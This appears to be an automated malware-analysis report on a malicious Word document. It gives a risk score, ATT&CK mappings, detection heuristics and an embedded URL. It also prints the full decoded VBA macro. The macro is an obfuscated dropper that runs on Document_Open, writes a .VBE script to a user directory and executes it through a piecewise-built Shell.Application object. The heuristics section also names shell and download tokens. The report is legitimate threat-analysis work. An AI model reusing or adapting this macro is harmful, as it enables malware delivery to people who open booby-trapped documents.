MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro attempts to obfuscate its code and uses CreateObject, indicating it likely aims to download and execute a secondary payload from the embedded URL http://web-intra.fhc-inc.net/live/essentials.php. The presence of VBA macros and the execution of code upon opening strongly suggest a malicious intent, likely delivered via spearphishing.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
= CreateObject( _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
wedwe23fff = Environ(nbvcsdfdsfwqw.fdsasddasd) & "\ddfffg" + wdasqw2dsf + yterwq4f + "Be" -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://web-intra.fhc-inc.net/live/essentials.php In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5489 bytes |
SHA-256: 3e37cc1a1e6c47a67a622716bed17a0cf40e7fc88a852124061aa2441781dc07 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
30 of 59 identifiers look randomly generated (e.g. 'BwHrfGYabsRuai') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nbvcxdadwadasd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub _
_
Document_Open()
ytrewfds32d = "hel"
Dim xyHRM As Integer
xyHRM = 174
Do While xyHRM < 174 + 10
xyHRM = xyHRM + 1: DoEvents
Loop
Dim gpBdxcASs As Integer
gpBdxcASs = 1944
Do While gpBdxcASs < 1944 + 10
gpBdxcASs = gpBdxcASs + 1: DoEvents
Loop
wdasqw2dsf = "cvdf"
Dim BqKBsFPzym As Integer
BqKBsFPzym = 994
Do While BqKBsFPzym < 994 + 10
BqKBsFPzym = BqKBsFPzym + 1: DoEvents
Loop
Dim pZGJeGKZ As Integer
pZGJeGKZ = 1615
Do While pZGJeGKZ < 1615 + 10
pZGJeGKZ = pZGJeGKZ + 1: DoEvents
Loop
fdsewe26fc = "plica"
Dim aChRNBVMD As Integer
aChRNBVMD = 1833
Do While aChRNBVMD < 1833 + 10
aChRNBVMD = aChRNBVMD + 1: DoEvents
Loop
Dim HTSjn As Integer
HTSjn = 759
Do While HTSjn < 759 + 10
HTSjn = HTSjn + 1: DoEvents
Loop
yterwq4f = ".V"
Dim AwwvzlelPqcs As Integer
AwwvzlelPqcs = 788
Do While AwwvzlelPqcs < 788 + 10
AwwvzlelPqcs = AwwvzlelPqcs + 1: DoEvents
Loop
Dim TpdnKFjkQ As Integer
TpdnKFjkQ = 978
Do While TpdnKFjkQ < 978 + 10
TpdnKFjkQ = TpdnKFjkQ + 1: DoEvents
Loop
Dim gty54r2qd As Integer
Dim uuVerSmRqH As Integer
uuVerSmRqH = 204
Do While uuVerSmRqH < 204 + 10
uuVerSmRqH = uuVerSmRqH + 1: DoEvents
Loop
Dim TlQbAb As Integer
TlQbAb = 2448
Do While TlQbAb < 2448 + 10
TlQbAb = TlQbAb + 1: DoEvents
Loop
gty54r2qd = FreeFile
Dim dEZDcuFurlD As Integer
dEZDcuFurlD = 1834
Do While dEZDcuFurlD < 1834 + 10
dEZDcuFurlD = dEZDcuFurlD + 1: DoEvents
Loop
Dim bxwYFQIMn As Integer
bxwYFQIMn = 1076
Do While bxwYFQIMn < 1076 + 10
bxwYFQIMn = bxwYFQIMn + 1: DoEvents
Loop
wedwe23fff = Environ(nbvcsdfdsfwqw.fdsasddasd) & "\ddfffg" + wdasqw2dsf + yterwq4f + "Be"
Dim nvHkDjGZlZ As Integer
nvHkDjGZlZ = 989
Do While nvHkDjGZlZ < 989 + 10
nvHkDjGZlZ = nvHkDjGZlZ + 1: DoEvents
Loop
Dim FsfFcbD As Integer
FsfFcbD = 1400
Do While FsfFcbD < 1400 + 10
FsfFcbD = FsfFcbD + 1: DoEvents
Loop
Open wedwe23fff For Output As #gty54r2qd
Dim KKxxZ As Integer
KKxxZ = 1831
Do While KKxxZ < 1831 + 10
KKxxZ = KKxxZ + 1: DoEvents
Loop
Dim GVOygjgkyIereQs As Integer
GVOygjgkyIereQs = 1323
Do While GVOygjgkyIereQs < 1323 + 10
GVOygjgkyIereQs = GVOygjgkyIereQs + 1: DoEvents
Loop
Print #gty54r2qd, nbvcsdfdsfwqw.bdvsadasdasdd
Dim NCQMD As Integer
NCQMD = 2177
Do While NCQMD < 2177 + 10
NCQMD = NCQMD + 1: DoEvents
Loop
Dim lbGPPOS As Integer
lbGPPOS = 625
Do While lbGPPOS < 625 + 10
lbGPPOS = lbGPPOS + 1: DoEvents
Loop
Print #gty54r2qd, nbvcsdfdsfwqw.bvcasdasdqwq
Dim juAwHZnvw As Integer
juAwHZnvw = 1352
Do While juAwHZnvw < 1352 + 10
juAwHZnvw = juAwHZnvw + 1: DoEvents
Loop
Dim fNNBnOlxLtKw As Integer
fNNBnOlxLtKw = 2319
Do While fNNBnOlxLtKw < 2319 + 10
fNNBnOlxLtKw = fNNBnOlxLtKw + 1: DoEvents
Loop
Close #gty54r2qd
Dim ZgKYQnqtlKZ As Integer
ZgKYQnqtlKZ = 862
Do While ZgKYQnqtlKZ < 862 + 10
ZgKYQnqtlKZ = ZgKYQnqtlKZ + 1: DoEvents
Loop
Dim jZEzA As Integer
jZEzA = 2160
Do While jZEzA < 2160 + 10
jZEzA = jZEzA + 1: DoEvents
Loop
Set hgfd3r2d _
= CreateObject( _
_
"S" + _
_
_
ytrewfds32d + _
_
_
_
"l.Ap" _
_
_
+ fdsewe26fc _
_
_
_
+ "tion")
hgfd3r2d _
_
_
. _
_
_
_
Open _
_
_
wedwe23fff
End Sub
Attribute VB_Name = "nbvcsdfdsfwqw"
Attribute VB_Base = "0{3B35E7F7-09B2-4569-B222-C22DEC2F3C2A}{35F813AA-E9A3-4419-91D3-28C9342ED2E4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "nQPLoq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "a0x285S"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "m4dpYTi"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "mSZhlqIzaAXnKs"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "BwHrfGYabsRuai"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.